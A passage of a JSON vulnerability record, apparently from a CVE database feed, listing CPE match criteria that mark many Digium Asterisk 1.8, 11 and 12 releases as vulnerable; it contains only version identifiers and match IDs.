              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "5F86406A-0936-4A06-88FB-4137A64498EE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "672CE4C0-EBD6-470B-937E-810FF1C4CDBD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "88DB1105-74D8-4312-9D02-D1E21F2E785C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "404C0557-6229-4D90-BFDD-54AFFCCE6A19",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "3F4DC562-649E-4105-8B3E-43F02BD593FC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "6D1D26CC-891F-4396-B7D7-30D712829E71",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "F25B61EA-F4D1-452A-9D96-B8DFDD719B0E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "9324AB96-EC99-4F04-A0A9-00F936C86EFA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "1B8B5E76-4A74-4E88-8A6F-C23538B7642A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "BDB6BBCA-47CE-49B8-9706-AFDE4BE46550",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "8BFF65E2-692B-4C39-88FC-6DED8D9A7258",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "5260E309-9320-4DB8-A918-7D215BF95D2B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "58F4BFC9-E02A-4121-8D34-99022AB8B45A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "60AFF340-A866-4CFE-9334-53B95FD4AA59",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "74E50309-CD7D-41F7-97DA-A7E451D0796A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "6FD3F8F8-820E-4C29-9F8F-023D1DB999CF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "C33A6419-0D00-49D6-9A48-2B633610AAED",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "447E07C9-4A25-418D-B53F-609B78EE4C21",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "8E8AE686-B618-4B0D-BD27-1F96295E964D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "9C806F87-C897-48E4-8533-A4EBC6B77078",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.0:patch:*:*:*:*:*:*",
              "matchCriteriaId": "08B8C143-93FF-44DD-8F61-6F4FEE977371",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "E9751C0A-84F5-4A43-8282-12A9DE559569",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "F67E2694-F6F1-482C-91F2-D9FD856EA31B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "5E2D53AA-8D50-445F-9500-2F580F260DC0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.1:-:*:*:*:*:*:*",
              "matchCriteriaId": "8859F234-5066-40DD-862C-0F3CCA98AFB1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.1:patch:*:*:*:*:*:*",
              "matchCriteriaId": "75962F03-EC19-4920-9FA7-2D422E6E83F7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12:*:*:*:*:*:*:*",
              "matchCriteriaId": "8D9D7D88-D64F-4F54-8C84-6AC45FBD36F6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F67AB282-591C-4ED7-9750-C593A38D5D7B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "B5D0BB0E-1BB0-4F31-9C5D-DC1A069E52DB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "C9F8F881-2BF7-44AB-8756-54A06801EB11",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "36EFF3C4-4D00-4BC5-94B9-403BB00C6AB6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "5E434F10-395E-426E-A988-4CDA504577D0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "33FE3DCE-74B5-49A4-BC18-34B22CA83947",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "FF2E25F3-053D-4F7D-A35D-706A401CCAA7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.13.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "8880AE7C-3E44-4B76-B500-E93868D4CF5D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.13.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "7C94269D-A271-42AC-A44C-102C814E564B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.13.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "E7E5B826-D3D5-4D2D-BB4D-2C1BEDE92456",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.13.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "5BA564F7-7A69-4805-8C8C-C2EB5E12A6E2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.14.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "2A153336-10C4-4C42-AC66-AC1351887EFA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.14.0:patch:*:*:*:*:*:*",
              "matchCriteriaId": "0C2FF4E9-2513-4022-AF80-6F44A2287D6F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.14.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "DF6FA464-F9D3-4674-844B-A2B2E2C42A51",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.14.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "44722C8B-BB37-4444-A58A-F01D0B3B4DDA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.14.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "C4FABFDB-D99A-4F83-8FEE-3BFA36BA4061",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.14.1:-:*:*:*:*:*:*",
              "matchCriteriaId": "43E00618-19F6-4828-818A-95C9106097B2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.14.1:patch:*:*:*:*:*:*",
              "matchCriteriaId": "CEC4F4AE-7BD8-437F-8838-FE564BCB7FA9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.15.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "A842E112-8974-4E74-AD56-1DEF5B5DD9F9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.15.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "2BC3B463-6B2C-42AF-BE13-50B7D63E7F05",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.15.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "D9ACBC01-8A9D-43A5-A825-1CC9670417A6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.15.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "61E7199F-EACE-431A-8ADD-B96A6FCDBC49",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.16.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "BA7CD0E5-8E69-43B5-A5FF-8B122475CC00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.16.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "2799111C-06DB-4979-8F81-A8C09D53E5F9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.16.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F4BEA1B2-2103-4E25-92A9-DB107D6D4AD5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.16.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "2AD9AFFB-F903-43DD-9C1D-4D8E83EA25C4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.17.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "6F368897-A481-42DD-A8B0-8AD43A5FD68B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.17.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "4F3C35F1-CBF2-4F77-AC19-574DEF2652A1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.17.0:patch:*:*:*:*:*:*",
              "matchCriteriaId": "75EA94FD-D16A-49BC-A418-36EFC187EC7A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.17.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "6BA8F4AF-26C0-4A69-B489-16E7A56E5123",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.17.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "FE82D53D-092D-4B36-A979-23E9A5E07A78",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.17.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "27365383-72DB-4683-9A67-CF553FF2620A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.18.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "46EE63D4-CA9C-4DF4-AF85-B8AC2E3F844A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.18.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "A14FC2A1-29D5-49FE-92A9-D61833BF1C95",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.18.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "91407E03-4E98-4DD9-B584-E5BB74F09B9C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.18.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "669CC22C-45E5-40AB-9A95-D7DFD694B688",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.19.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "80A38E0C-45D9-4353-8426-87A4CFA371DB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.19.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "5E3C5C1E-67E9-401A-BA52-FCB32CA4473C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.19.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "54A934AE-AB7C-4D10-8BA2-9C54410C648F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.19.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "7A7C5A8E-35E6-4B86-8502-1970031AB987",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.19.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "1FA4C14B-A01C-4CFE-8985-317ACCDAD209",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.20.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "501F5764-BBC2-426A-AF01-7FB477850073",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.20.0:patch:*:*:*:*:*:*",
              "matchCriteriaId": "FDB35CE5-4EDB-4949-A5E4-1BD721CCA469",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.20.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "619704FF-2F0C-47E8-A340-58135CEE6B89",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.20.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "E412E336-871A-4CAC-97E5-FB203BB9349D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.20.1:-:*:*:*:*:*:*",
              "matchCriteriaId": "82ED9CD2-504E-4D7B-B242-2511A7730776",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.20.1:patch:*:*:*:*:*:*",
              "matchCriteriaId": "EF6E50F5-605A-4D2B-B55D-8AB251532E8C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.20.2:-:*:*:*:*:*:*",
              "matchCriteriaId": "F6C796AE-95EE-4EAB-959C-1C1353C565A0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.20.2:patch:*:*:*:*:*:*",
              "matchCriteriaId": "EEAF3B2E-E520-4F43-ACC5-0F01A6247199",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.21.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "085D4102-E2E8-496C-85B7-714FD3639BE1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.21.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "FC1A0E66-63F4-4BD0-8C9A-3D23A116EE08",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.21.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "79963FF0-5ED6-41B6-8E60-146BD7879518",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.22.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "E0ABBB2C-19EC-4D6C-A1EA-AEF0ABA4123D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.22.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "0787BC7B-9464-4AAA-896B-C028ECF8E397",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.22.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "84C0FBC8-9CD1-4135-94C7-BE90A7C94625",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.23.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "981F3994-392D-47DB-97DA-AC15BA070A36",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.23.0:patch:*:*:*:*:*:*",
              "matchCriteriaId": "94691EE6-266F-46CE-B388-0289EB39D91A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.23.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "FD3948A1-B5A6-4702-9187-A7720E81B7F3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.23.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "BC097BB6-02E9-4F48-98CB-B5F31B41009C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.23.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "3C2FD962-B1D5-41E5-884E-0C3F7F9DACE8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.24.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "096E966A-878B-426F-AB40-BB476B17B969",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.24.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "852DAF2A-86F3-4D05-91DC-6A2FBC214736",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.24.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "7D721486-3043-4380-A73C-44B4DD0E34C4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.24.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "1F29E2EE-B6E8-4E55-84A8-3BD0658387EE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.25.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "837BF2BD-814F-4503-91DF-EE16B5A4921D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.25.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "15FCDDB3-62D8-446C-B57C-F3BBFBD13491",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.25.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "03512BDE-E441-46F6-88B7-16A2468CA199",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.26.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "902CAF9D-9D02-47FA-AE2E-EC1268A32BA7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.26.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "80AD87B5-B796-4C44-8A6D-0B22AA2903CD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.26.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "6D87B2B3-E40B-4BF7-91E6-3B3F9CA28719",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.27.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "2575F7A4-E1F1-4836-A467-076EDD8484B8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.27.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "CBDFAFA3-A52F-4FC8-BA51-FE52D5F57DD8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.27.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "6085E437-87B8-4355-BDC0-A14EA4F52695",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.28.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "5C44D1ED-2435-4042-BF15-3D752BE0C661",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.28.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "23E4CE5C-375C-4ECB-A4D9-A5A6805E5FE0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "B446105E-6C8E-495A-BF83-A33CB33485A5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "F3DE062D-4E87-4691-A664-D9E7C02036EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "3B4D6D24-A718-4962-AD4E-F19AFB03BFF4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "BE2F0D0D-761C-4338-93F0-506E94E57000",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "3D38DFCA-E357-4A28-8F03-FDADF40A5185",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "B3CD4A85-26FB-4AE5-9CB7-4DF38DF32482",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F42C9442-9EBC-4CA5-AB1C-BA0662C27BDC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.2.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "71762B58-A08B-405B-9596-6D15CF4A95D0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.2.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "EA48C05A-E898-42EE-A699-94BBD66E5E0A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.2.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "EDCB78F8-AAC8-44B1-BDF4-C73BC8951EC3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.3.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "5D92FFF6-E7B2-4210-A652-79AC6B74002C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.3.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "DB5E92FB-9CF8-461E-A665-3407D265DF17",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.3.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "536F6C10-3165-40F7-931A-23765AB87555",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F53B8453-F35A-49BE-8129-774BADF71BA7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "CCB0C07E-DA2F-4169-848D-C3315CDC1CB3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "410C43E6-5912-4C22-A592-7CF94402EEB7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "D50A355E-1B55-4DD2-8100-EB81AA6FC40E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "9ADF4230-EFEB-45EC-9C96-0262B4A3E459",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "5234531C-F69A-4B94-A480-147734206C5A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "321C1066-6800-4488-A7C4-BE91FF738453",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "A9B51588-50A2-40B2-A007-06F57D38C7AA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "CDE2B00C-6AC0-4166-8A25-EFC42CE7F737",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "617FC4AF-D152-4EE1-828D-C2A6AD0DFD3B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "3A3FE6DC-17FD-4CEE-BDFB-9D4685640381",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "8CEEB6C2-0A6D-4434-8446-CB8605CD3B14",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.2.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "1548C574-CD51-49F6-91B1-B06C504000E4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.2.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "D56C2C11-4B42-43AB-9DAE-61C15D107160",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.3.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "69F2DED4-39F5-44C8-BEA3-22692D28C631",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.3.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "AD172E70-238B-4B01-A922-8021B5627092",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C689A32B-E87D-492F-B3F6-7B80DFA049C8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.4.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "5FB3863D-7F46-4C4A-9E6B-C255CDF0D953",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.4.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "7239304D-C383-4F26-BB08-65ADD2380015",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.4.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "1AC153C2-258E-4EE6-845F-8E8C68AA242D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "229B7982-9775-42AA-B8F5-FE920CCAA497",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.5.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "326845DF-2DB2-406B-BE0F-877384DAACFE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.5.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "E0FC2D46-FD1B-421F-8773-BB41B1E9A831",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.5.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "8788AF7B-CBB6-4D9D-A748-486787935A96",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.8.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "03298D9F-CFB8-48F9-BD0C-8A0BEB0760C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.8.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "87FCBE6A-C1CD-48EF-A435-4CEADD46C917",
              "vulnerable": true
            },
            {
